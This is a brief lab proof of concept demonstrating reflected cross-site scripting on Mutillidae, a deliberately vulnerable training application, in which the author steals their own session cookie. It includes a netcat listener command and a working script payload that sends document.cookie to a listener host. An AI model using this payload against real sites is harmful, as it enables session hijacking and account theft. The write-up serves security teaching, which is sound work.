Simple proof on concept stealing cookies on a page vulnerable to XSS. Using Mutillidae as a vulnerable application, I’ll perform reflective cross-site scripting against myself and steal my own session cookie.
First, I’ll set up a listener using Netcat:
C:\Tools>nc -nlvp 4321
I’ll navigate to the vulnerable page:
In the input field of the vulnerable page I’ll enter my demo JavaScript to capture the cookie header:
<script>document.location='http://192.168.0.6:4321/cgi-bin/grab.cgi?'+document.cookie;</script>
When I click the “Lookup DNS” button, the JavaScript executes, and writes my cookie value to my Netcat listener: